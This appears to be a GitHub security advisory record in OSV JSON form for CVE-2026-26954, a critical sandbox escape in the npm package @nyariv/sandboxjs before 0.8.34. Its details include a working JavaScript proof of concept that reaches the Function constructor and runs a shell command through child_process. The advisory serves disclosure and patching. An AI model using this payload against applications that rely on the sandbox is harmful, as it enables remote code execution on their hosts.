{"id":"GHSA-6r9f-759j-hjgv","summary":"SandboxJS affected by a Sandbox Escape","details":"### Summary\n\nIt is possible to obtain arrays containing `Function`, which allows escaping the sandbox.\n\n### Details\n\nThere are various ways to get an array containing `Function`, e.g.\n\n```js\nObject.entries(this).at(1) // [ 'Function', [Function: Function] ]\nObject.values(this).slice(1, 2) // [ [Function: Function] ]\n```\n\nGiven an array containing `Function`, and  `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox.\n\n### PoC\n```js\nconst s = require('.').default;\nconst sb = new s();\n\npayload = `\nconst p = (async function () {})();\n({\n  \"finally\": p.finally,\n  ...Object.fromEntries([['then', ...Object.values(this).slice(1)]]),\n}).finally('a=process.getBuiltinModule(\"child_process\").execSync(\"ls\", {stdio: \"inherit\"})')();\n`;\n\nsb.compile(payload)().run();\n```\n\n### Impact\n\nSandbox Escape -\u003e RCE","aliases":["CVE-2026-26954"],"modified":"2026-03-16T17:16:38.369045Z","published":"2026-03-13T13:46:08Z","database_specific":{"github_reviewed":true,"cwe_ids":["CWE-94"],"severity":"CRITICAL","nvd_published_at":"2026-03-13T19:54:31Z","github_reviewed_at":"2026-03-13T13:46:08Z"},"references":[{"type":"WEB","url":"https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26954"},{"type":"WEB","url":"https://github.com/nyariv/SandboxJS/commit/e01505b1ea49f4f13956cd12b7ce01b83d2ee085"},{"type":"PACKAGE","url":"https://github.com/nyariv/SandboxJS"},{"type":"WEB","url":"https://github.com/nyariv/SandboxJS/releases/tag/v0.8.34"}],"affected":[{"package":{"name":"@nyariv/sandboxjs","ecosystem":"npm","purl":"pkg:npm/%40nyariv/sandboxjs"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"0.8.34"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 0.8.33","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-6r9f-759j-hjgv/GHSA-6r9f-759j-hjgv.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}